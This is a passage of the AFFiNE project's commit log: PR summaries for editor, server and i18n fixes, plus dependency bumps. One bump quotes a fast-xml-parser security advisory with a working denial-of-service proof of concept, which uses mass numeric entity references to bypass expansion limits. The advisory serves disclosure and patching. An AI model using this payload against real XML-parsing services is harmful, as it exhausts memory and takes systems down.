[MutableContainer]:
https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Protocols/Container/MutableContainer.swift

[PermutableContainer]:
https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Protocols/Container/PermutableContainer.swift

[RangeReplaceableContainer]:
https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Protocols/Container/RangeReplaceableContainer.swift

[DynamicContainer]:
https://redirect.github.com/apple/swift-collections/blob/main/Sources/ContainersPreview/Protocols/Container/DynamicContainer.swift

- We now have [working reference
implementations](https://redirect.github.com/apple/swift-collections/tree/main/Sources/ContainersPreview/Protocols)
of lazy `map`, `reduce` and `filter` operations on borrowing iterators,
producers and drains, as well a `collect(into:)` family of methods to
supply "greedy" variants, generating items into a container of the
user's choice. Importantly, the algorithms tend to be defined on the
iterator types, rather than directly on some sequence/container -- going
this way has some interesting benefits (explicitness, no confusion
between the various flavors or the existing `Sequence` algorithms), but
they also have notable drawbacks (minor design issues with the borrowing
iterator protocol, unknowns on how the pattern would apply to container
algorithms, etc.).

```swift
    let items: RigidArray<Int> = ...
    let transformed = 
      items.makeBorrowingIterator() // obviously we'd want a better name here, like `borrow()`
      .map { 2 * $0 }
      .collect(into: UniqueArray.self)
    // `transformed` is a UniqueArray instance holding all values in `items`, doubled up 
```

```swift
    let items: RigidArray = ...
    let transformed = 
       items.makeBorrowingIterator()
      .filter { !$0.isMultiple(of: 7) }
      .copy()
      .collect(into: UniqueArray.self)
    // `transformed` holds a copy of all values in `items` that aren't a multiple of 7
```

```swift
    let items: RigidArray = ...
    let transformed = 
       items.consumeAll()
      .filter { !$0.isMultiple(of: 7) }
      .collect(into: UniqueArray.self)
    // `transformed` holds all values that were previously in `items` that aren't a multiple of 7. `items` is now empty.
```

Like before, these are highly experimental, and they will definitely
change in dramatic/radical ways on the way to stabilization. Note that
there is no project- or team-wide consensus on any of these constructs.
I'm publishing them primarily as a crucial reference point, and to gain
a level of shared understanding of the actual problems that need to be
resolved, and the consequences of the design path we are on.

#### What's Changed

- Add some decorative badges in the README by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;591](https://redirect.github.com/apple/swift-collections/pull/591)
- \[Dequemodule, OrderedCollections] Avoid using floating point
arithmetic by [@&#8203;lorentey](https://redirect.github.com/lorentey)
in
[#&#8203;592](https://redirect.github.com/apple/swift-collections/pull/592)
- Enforce dress code for license headers by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;593](https://redirect.github.com/apple/swift-collections/pull/593)
- Bump swiftlang/github-workflows/.github/workflows/soundness.yml from
0.0.7 to 0.0.8 by
[@&#8203;dependabot](https://redirect.github.com/dependabot)\[bot] in
[#&#8203;595](https://redirect.github.com/apple/swift-collections/pull/595)
- Documentation updates for latest DocC by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;596](https://redirect.github.com/apple/swift-collections/pull/596)
- \[BasicContainers] Allow standalone use of the
UnstableHashedContainers trait by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;597](https://redirect.github.com/apple/swift-collections/pull/597)
- Bump
swiftlang/github-workflows/.github/workflows/swift\_package\_test.yml
from 0.0.7 to 0.0.8 by
[@&#8203;dependabot](https://redirect.github.com/dependabot)\[bot] in
[#&#8203;594](https://redirect.github.com/apple/swift-collections/pull/594)
- \[ContainersPreview] Rename Producer.generateNext() to next() by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;599](https://redirect.github.com/apple/swift-collections/pull/599)
- \[ContainersPreview] Remove BorrowingSequence.first by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;598](https://redirect.github.com/apple/swift-collections/pull/598)
- \[CI] Enable Android testing by
[@&#8203;marcprux](https://redirect.github.com/marcprux) in
[#&#8203;558](https://redirect.github.com/apple/swift-collections/pull/558)
- \[BasicContainers] Assorted hashed container fixes and improvements by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;601](https://redirect.github.com/apple/swift-collections/pull/601)
- Flesh out BorrowingSequence/Container/Producer model a little more by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;603](https://redirect.github.com/apple/swift-collections/pull/603)
- More exploration of ownership-aware container/iterator algorithms by
[@&#8203;lorentey](https://redirect.github.com/lorentey) in
[#&#8203;605](https://redirect.github.com/apple/swift-collections/pull/605)

#### New Contributors

- [@&#8203;marcprux](https://redirect.github.com/marcprux) made their
first contribution in
[#&#8203;558](https://redirect.github.com/apple/swift-collections/pull/558)

**Full Changelog**:
<https://github.com/apple/swift-collections/compare/1.4.0...1.4.1>

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My42Ni40IiwidXBkYXRlZEluVmVyIjoiNDMuNjYuNCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-22 02:52:07 +08:00
DarkSky f47ee2bc8a feat(server): improve indexer (#14698)
fix #13862 


#### PR Dependency Tree


* **PR #14698** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **New Features**
* Enhanced search support for Chinese, Japanese, and Korean languages
with improved text segmentation and character matching.
* Added index management capabilities with table recreation
functionality.

* **Bug Fixes**
* Improved search accuracy for non-Latin scripts through updated
morphology and n-gram configuration.

* **Chores**
  * Added database migration for search index optimization.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-22 02:50:59 +08:00
DarkSky bcf2a51d41 feat(native): record encoding (#14188)
fix #13784 

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Start/stop system or meeting recordings with Ogg/Opus artifacts and
native start/stop APIs; workspace backup recovery.

* **Refactor**
* Simplified recording lifecycle and UI flows; native runtime now
orchestrates recording/processing and reporting.

* **Bug Fixes**
* Stronger path validation, safer import/export dialogs, consistent
error handling/logging, and retry-safe recording processing.

* **Chores**
* Added cross-platform native audio capture and Ogg/Opus encoding
support.

* **Tests**
* New unit, integration, and e2e tests for recording, path guards,
dialogs, and workspace recovery.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-22 02:50:14 +08:00
DarkSky 6a93566422 chore: bump deps (#14690)
#### PR Dependency Tree


* **PR #14690** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Chores**
* Updated package manager and development tooling to latest compatible
versions.
* Updated backend framework and monitoring dependencies to latest
minor/patch releases.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-20 05:23:03 +08:00
DarkSky 7ac8b14b65 feat(editor): migrate typst mermaid to native (#14499)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Native/WASM Mermaid and Typst SVG preview rendering on desktop and
mobile, plus cross-platform Preview plugin integrations.

* **Improvements**
* Centralized, sanitized rendering bridge with automatic Typst
font-directory handling and configurable native renderer selection.
* More consistent and robust error serialization and worker-backed
preview flows for improved stability and performance.

* **Tests**
* Extensive unit and integration tests for preview rendering, font
discovery, sanitization, and error serialization.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-20 04:04:40 +08:00
DarkSky 16a8f17717 feat(server): improve oidc compatibility (#14686)
fix #13938 
fix #14683 
fix #14532

#### PR Dependency Tree


* **PR #14686** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Flexible OIDC claim mapping for email/name, automatic OIDC discovery
retry with exponential backoff, and explicit OAuth flow modes (popup vs
redirect) propagated through the auth flow.

* **Bug Fixes**
* Stricter OIDC email validation, clearer error messages listing
attempted claim candidates, and improved callback redirect handling for
various flow scenarios.

* **Tests**
* Added unit tests covering OIDC behaviors, backoff scheduler/promise
utilities, and frontend OAuth flow parsing/redirect logic.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-20 04:02:37 +08:00
DarkSky 1ffb8c922c fix(native): cleanup deleted docs and blobs (#14689) 2026-03-20 04:00:25 +08:00
DarkSky daf536f77a fix(native): misalignment between index clock and snapshot clock (#14688)
fix #14191

#### PR Dependency Tree


* **PR #14688** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Improved indexer synchronization timing for clock persistence to
prevent premature completion signals
  * Enhanced document-level indexing status tracking accuracy
  * Optimized refresh behavior for better state consistency

* **Chores**
  * Updated indexer versioning system

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-20 02:09:11 +08:00
congzhou09 0d2d4bb6a1 fix(editor): note-edgeless-block loses edit state during shift-click range selection (#14675)
### Problem
●In edgeless mode, when using Shift + click to perform range selection
inside an editing `note-edgeless-block` (click at the starting point,
then hold Shift and click at the end point), the block will unexpectedly
lose its editing and selection state. As a result, subsequent operations
on the selection - such as deleting and moving - no longer work.

●The following video demonstrates this issue:


https://github.com/user-attachments/assets/82c68683-e002-4a58-b011-fe59f7fc9f02

### Solution
●The reason is that this "Shift + click" behavior is being handled by
the default multi-selection logic, which toggles selection mode and
exits the editing state. So I added an `else-if` branch to match this
case.

### After
●The video below shows the behavior after this fix.


https://github.com/user-attachments/assets/18d61108-2089-4def-b2dc-ae13fc5ac333

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Improved selection behavior during note editing in multi-select mode
to provide more intuitive interaction when using range selection during
active editing.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-19 22:22:22 +08:00
Mohad cb9897d493 fix(i18n): support Arabic comma separator in date-picker weekDays and monthNames (#14663)
## Problem

The Arabic locale strings in `ar.json` use the Arabic comma `،` (U+060C)
as separator:

```json
"com.affine.calendar-date-picker.week-days": "أ،إث،ث،أر،خ،ج،س"
```

But `day-picker.tsx` splits on ASCII comma only — causing all
weekday/month names to render as a single unsplit string in Arabic
locale.

## Fix

Change `.split(',')` to `.split(/[,،]/)` in two call sites — matches
both ASCII and Arabic comma.

## Impact

One-line fix per call site. No other functionality affected. All
non-Arabic locales unchanged.

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
* Date picker rendering updated to correctly handle both ASCII and
Arabic/Persian comma formats when determining month and weekday labels.
This fixes inconsistent header and month-name displays in locales using
different comma characters while preserving existing interactions and
behavior.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-19 22:21:51 +08:00
Ishan Goswami 8ca8333cd6 chore(server): update exa search tool description (#14682)
Updated the Exa search tool description to better reflect what Exa does.

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Chores**
* Clarified the web search tool description to state it uses Exa, a web
search API optimized for AI applications to improve labeling and user
understanding.
* No functional or behavioral changes to the tool; this update affects
only the displayed description users see.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

---------

Co-authored-by: Devin AI <158243242+devin-ai-integration[bot]@users.noreply.github.com>
Co-authored-by: ishan <ishan@exa.ai>
2026-03-19 05:42:04 +08:00
George Kapetanakis 3bf2503f55 fix(tools): improve sed error handling in set-version script (#14684)
## Summary
Replace post-command status checks with inline failure handling around
`sed` calls.
In the stream update path, ensure the two `sed` operations are treated
as one success/failure unit.
Keep behavior and file outputs the same on success, while making failure
handling explicit.

## Why
When `set -e` is enabled (which the script itself enables) command
failures cause the script to exit, making error handling by checking
`$?` not work.

## Files affected
- `set-version.sh`

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Refactor**
* Enhanced error handling in version management script with improved
failure reporting and context information.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-19 05:36:41 +08:00
DarkSky 59fd942f40 fix(editor): database detail style (#14680)
fix #13923


#### PR Dependency Tree


* **PR #14680** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Style**
* Refined styling and alignment for number field displays in the
database view component.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-18 14:58:53 +08:00
DarkSky d6d5ae6182 fix(electron): create doc shortcut should follow default type in settings (#14678) 2026-03-18 14:58:22 +08:00
renovate[bot] c1a09b951f chore: bump up fast-xml-parser version to v5.5.6 [SECURITY] (#14676)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[fast-xml-parser](https://redirect.github.com/NaturalIntelligence/fast-xml-parser)
| [`5.4.1` →
`5.5.6`](https://renovatebot.com/diffs/npm/fast-xml-parser/5.4.1/5.5.6)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/fast-xml-parser/5.5.6?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/fast-xml-parser/5.4.1/5.5.6?slim=true)
|

### GitHub Vulnerability Alerts

####
[CVE-2026-33036](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-8gc5-j5rx-235r)

## Summary

The fix for CVE-2026-26278 added entity expansion limits
(`maxTotalExpansions`, `maxExpandedLength`, `maxEntityCount`,
`maxEntitySize`) to prevent XML entity expansion Denial of Service.
However, these limits are only enforced for DOCTYPE-defined entities.
**Numeric character references** (`&#NNN;` and `&#xHH;`) and standard
XML entities (`&lt;`, `&gt;`, etc.) are processed through a separate
code path that does NOT enforce any expansion limits.

An attacker can use massive numbers of numeric entity references to
completely bypass all configured limits, causing excessive memory
allocation and CPU consumption.

## Affected Versions

fast-xml-parser v5.x through v5.5.3 (and likely v5.5.5 on npm)

## Root Cause

In `src/xmlparser/OrderedObjParser.js`, the `replaceEntitiesValue()`
function has two separate entity replacement loops:

1. **Lines 638-670**: DOCTYPE entities — expansion counting with
`entityExpansionCount` and `currentExpandedLength` tracking. This was
the CVE-2026-26278 fix.
2. **Lines 674-677**: `lastEntities` loop — replaces standard entities
including `num_dec` (`/&#([0-9]{1,7});/g`) and `num_hex`
(`/&#x([0-9a-fA-F]{1,6});/g`). **This loop has NO expansion counting at
all.**

The numeric entity regex replacements at lines 97-98 are part of
`lastEntities` and go through the uncounted loop, completely bypassing
the CVE-2026-26278 fix.

## Proof of Concept

```javascript
const { XMLParser } = require('fast-xml-parser');

// Even with strict explicit limits, numeric entities bypass them
const parser = new XMLParser({
  processEntities: {
    enabled: true,
    maxTotalExpansions: 10,
    maxExpandedLength: 100,
    maxEntityCount: 1,
    maxEntitySize: 10
  }
});

// 100K numeric entity references — should be blocked by maxTotalExpansions=10
const xml = `<root>${'&#&#8203;65;'.repeat(100000)}</root>`;
const result = parser.parse(xml);

// Output: 500,000 chars — bypasses maxExpandedLength=100 completely
console.log('Output length:', result.root.length);  // 500000
console.log('Expected max:', 100);  // limit was 100
```

**Results:**
- 100K `&#&#8203;65;` references → 500,000 char output (5x default
maxExpandedLength of 100,000)
- 1M references → 5,000,000 char output, ~147MB memory consumed
- Even with `maxTotalExpansions=10` and `maxExpandedLength=100`, 10K
references produce 50,000 chars
- Hex entities (`&#x41;`) exhibit the same bypass

## Impact

**Denial of Service** — An attacker who can provide XML input to
applications using fast-xml-parser can cause:
- Excessive memory allocation (147MB+ for 1M entity references)
- CPU consumption during regex replacement
- Potential process crash via OOM

This is particularly dangerous because the application developer may
have explicitly configured strict entity expansion limits believing they
are protected, while numeric entities silently bypass all of them.

## Suggested Fix

Apply the same `entityExpansionCount` and `currentExpandedLength`
tracking to the `lastEntities` loop (lines 674-677) and the HTML
entities loop (lines 680-686), similar to how DOCTYPE entities are
tracked at lines 638-670.

## Workaround

Set `htmlEntities:false`

---

### Release Notes

<details>
<summary>NaturalIntelligence/fast-xml-parser (fast-xml-parser)</summary>

###
[`v5.5.6`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/e54155f53048e9d58e27f170d3ccff15176b6671...870043e75e78545192bc70950c6286d36c7cdf23)

[Compare
Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.5...v5.5.6)

###
[`v5.5.5`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/ea07bb2e8435a88136c0e46d7ee8a345107b7582...e54155f53048e9d58e27f170d3ccff15176b6671)

[Compare
Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.4...v5.5.5)

###
[`v5.5.4`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.3...ea07bb2e8435a88136c0e46d7ee8a345107b7582)

[Compare
Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.3...v5.5.4)

###
[`v5.5.3`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.2...v5.5.3)

[Compare
Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.2...v5.5.3)

###
[`v5.5.2`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.1...e0a14f7d15a293732e630ce1b7faa39924de2359)

[Compare
Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.1...v5.5.2)

###
[`v5.5.1`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.5.1):
integrate path-expression-matcher

[Compare
Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.5.0...v5.5.1)

- support path-expression-matcher
- fix: stopNode should not be parsed
- performance improvement for stopNode checking

###
[`v5.5.0`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.4.2...ce017923460f92861e8fc94c91e52f9f5bd6a1b0)

[Compare
Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.4.2...v5.5.0)

###
[`v5.4.2`](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.4.1...v5.4.2)

[Compare
Source](https://redirect.github.com/NaturalIntelligence/fast-xml-parser/compare/v5.4.1...v5.4.2)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My42Ni40IiwidXBkYXRlZEluVmVyIjoiNDMuNjYuNCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-18 13:28:53 +08:00
DarkSky 4ce68d74f1 fix(editor): chat cannot scroll on windows (#14677)
fix #14529 
fix #14612 
replace #14614 #14657


#### PR Dependency Tree


* **PR #14677** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Tests**
* Added test coverage for scroll position tracking and pinned scroll
behavior in AI chat
* Added test suite verifying scroll-to-end and scroll-to-position
functionality

* **New Features**
* Introduced configurable scrollable option for text rendering in AI
chat components, allowing control over scroll behavior

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-18 13:28:05 +08:00
chauhan_s fbfcc01d14 fix(core): reserve space for auth input error to avoid layout shift (#14670)
Prevents layout shift when showing auth input errors by reserving space
for the error message. Improves visual stability and avoids UI jumps
when validation errors appear.

### Before 


https://github.com/user-attachments/assets/7439aa5e-069d-42ac-8963-e5cdee341ad9



### After

https://github.com/user-attachments/assets/8e758452-5323-4807-8a0d-38913303020d


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Refactor**
* Improved error message display mechanism in authentication components
for more consistent rendering.

* **Style**
* Enhanced vertical spacing for error messages in form inputs to ensure
better visual consistency and readability.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-18 10:48:50 +08:00
DarkSky 1112a06623 fix: ci 2026-03-17 23:32:57 +08:00
chauhan_s bbcb7e69fe fix: correct "has accept" to "has accepted" (#14669)
fixes #14407

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Corrected grammar in the notification message displayed when an
invitation is accepted.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-17 23:29:28 +08:00
steffenrapp cc2f23339e feat(i18n): update German translation (#14674)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Documentation**
* Enhanced German language support with new translations for Obsidian
import, MCP server integration, and Copilot features. Improved error
message translations for better clarity and consistency.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-17 23:28:36 +08:00
chauhan_s 31101a69e7 fix: Refine verify email dialog for verify and change email flows (#14671)
### Summary
This PR improves the verify email dialog by giving the verify-email and
change-email flows distinct messaging instead of reusing the same
generic copy.

### What changed
* Use flow-specific body copy in the verify email dialog
* Keep the existing action-specific subtitle behavior for:
  * Verify email
  * Change email
* Update the English i18n strings so each flow explains the correct
intent:
  * Verify email focuses on confirming email ownership
  * Change email focuses on securely starting the email-change process
### Why
The previous dialog message was shared across both flows, which made the
change-email experience feel ambiguous. This update makes the intent
clearer for users and better matches the action they are taking.



https://www.loom.com/share/c64c20570a8242358bd178a2ac50e413


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Improved clarity in email verification and email change dialog
messages to better explain the confirmation process and link purpose.
* Enhanced distinction between email verification and email change
workflows with context-specific messaging.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-17 23:28:16 +08:00
Francisco Jiménez 0b1a44863f feat(editor): add obsidian vault import support (#14593)
fix #14592 

### Description
> 🤖 **Note:** The code in this Pull Request were developed with the
assistance of AI, but have been thoroughly reviewed and manually tested.

> I noticed there's a check when opening an issue that asks _"Is your
content generated by AI?"_, so I mention it here in case it's a deal
breaker. If so I understand, you can close the PR, just wanted to share
this in case it's useful anyways.

This PR introduces **Obsidian Vault Import Support** to AFFiNE. 

Previously, users migrating from Obsidian had to rely on the generic
Markdown importer, which often resulted in broken cross-links, missing
directory structures, and metadata conflicts because Obsidian relies
heavily on proprietary structures not supported by standard Markdown.

This completely new feature makes migrating to AFFiNE easy.

**Key Features & Implementations:**

1. **Vault (Directory) Selection**
- Utilizes the `openDirectory` blocksuite utility in the import modal to
allow users to select an entire folder directly from their filesystem,
maintaining file context rather than forcing `.zip` uploads.

2. **Wikilink Resolution (Two-Pass Import)**
- Restructured the `importObsidianVault` process into a two-pass
architecture.
- **Pass 1:** Discovers all files, assigns new AFFiNE document IDs, and
maps them efficiently (by title, alias, and filename) into a
high-performance hash map.
- **Pass 2:** Processes the generic markdown AST and correctly maps
custom `[[wikilinks]]` to the actual pre-registered AFFiNE blocksuite
document IDs via `obsidianWikilinkToDeltaMatcher`.
- Safely strips leading emojis from wikilink aliases to prevent
duplicated page icons rendering mid-sentence.

3. **Emoji Metadata & State Fixes**
- Implemented an aggressive, single-pass RegExp to extract multiple
leading/combining emojis (`Emoji_Presentation` / `\ufe0f`) from H1
headers and Frontmatter. Emojis are assigned specifically to the page
icon metadata property and cleanly stripped from the visual document
title.
- Fixed a core mutation bug where the loop iterating over existing
`docMetas` was aggressively overwriting newly minted IDs for the current
import batch. This fully resolves the issue where imported pages
(especially re-imports) were incorrectly flagged as `trashed`.
   - Enforces explicit `trash: false` patch instructions.

4. **Syntax Conversion**
- Implemented conversion of Obsidian-style Callouts (`> [!NOTE] Title`)
into native AFFiNE block formats (`> 💡 **Title**`).
- Hardened the `blockquote` parser so that nested structures (like `> -
list items`) are fully preserved instead of discarded.

### UI Changes
- Updated the Import Modal to include the "Import Obsidian Vault" flow
utilizing the native filesystem directory picker.
- Regenerated and synced `i18n-completenesses.json` correctly up to 100%
across all supported locales for the new modal string additions.

### Testing Instructions
1. Navigate to the Workspace sidebar and click "Import".
2. Select "Obsidian" and use the directory picker to define a
comprehensive Vault folder.
3. Validate that cross-links between documents automatically resolve to
their specific AFFiNE instances.
4. Validate documents containing leading Emojis display exactly one
Emoji (in the page icon area), and none duplicated in the actual title
header.
5. Validate Callouts are rendered cleanly and correctly, and no
documents are incorrectly marked as "Trash".


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Import Obsidian vaults with wikilink resolution, emoji/title
preservation, asset handling, and automatic document creation.
* Folder-based imports via a Directory Picker (with hidden-input
fallback) integrated into the import dialog.

* **Localization**
  * Added Obsidian import label and tooltip translations.

* **Tests**
* Added end-to-end tests validating Obsidian vault import and asset
handling.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

---------

Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com>
Co-authored-by: DarkSky <darksky2048@gmail.com>
2026-03-17 00:49:17 +08:00
DarkSky 8406f9656e perf(editor): improve bounding box calc caching (#14668)
#### PR Dependency Tree


* **PR #14668** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)
2026-03-16 23:35:38 +08:00
DarkSky 121c0d172d feat(server): improve doc tools error handle (#14662)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Centralized sync/status messages for cloud document sync and explicit
user-facing error types.
* Frontend helpers to detect and display tool errors with friendly
names.

* **Bug Fixes**
* Consistent, actionable error reporting for document and attachment
reads instead of silent failures.
* Search and semantic tools now validate workspace sync and permissions
and return clear responses.

* **Tests**
* Added comprehensive tests covering document/blob reads, search tools,
and sync/error paths.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-16 02:20:35 +08:00
renovate[bot] 8f03090780 chore: bump up Lakr233/MarkdownView version to from: "3.8.2" (#14658)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
|
[Lakr233/MarkdownView](https://redirect.github.com/Lakr233/MarkdownView)
| minor | `from: "3.6.3"` → `from: "3.8.2"` |

---

### Release Notes

<details>
<summary>Lakr233/MarkdownView (Lakr233/MarkdownView)</summary>

###
[`v3.8.2`](https://redirect.github.com/Lakr233/MarkdownView/compare/3.8.1...3.8.2)

[Compare
Source](https://redirect.github.com/Lakr233/MarkdownView/compare/3.8.1...3.8.2)

###
[`v3.8.1`](https://redirect.github.com/Lakr233/MarkdownView/compare/3.8.0...3.8.1)

[Compare
Source](https://redirect.github.com/Lakr233/MarkdownView/compare/3.8.0...3.8.1)

###
[`v3.8.0`](https://redirect.github.com/Lakr233/MarkdownView/compare/3.7.0...3.8.0)

[Compare
Source](https://redirect.github.com/Lakr233/MarkdownView/compare/3.7.0...3.8.0)

###
[`v3.7.0`](https://redirect.github.com/Lakr233/MarkdownView/compare/3.6.3...3.7.0)

[Compare
Source](https://redirect.github.com/Lakr233/MarkdownView/compare/3.6.3...3.7.0)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My42Ni40IiwidXBkYXRlZEluVmVyIjoiNDMuNjYuNCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-16 00:57:48 +08:00
renovate[bot] 8125cc0e75 chore: bump up Lakr233/ListViewKit version to from: "1.2.0" (#14617)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
| [Lakr233/ListViewKit](https://redirect.github.com/Lakr233/ListViewKit)
| minor | `from: "1.1.8"` → `from: "1.2.0"` |

---

### Release Notes

<details>
<summary>Lakr233/ListViewKit (Lakr233/ListViewKit)</summary>

###
[`v1.2.0`](https://redirect.github.com/Lakr233/ListViewKit/compare/1.1.8...1.2.0)

[Compare
Source](https://redirect.github.com/Lakr233/ListViewKit/compare/1.1.8...1.2.0)

</details>

---

### Configuration

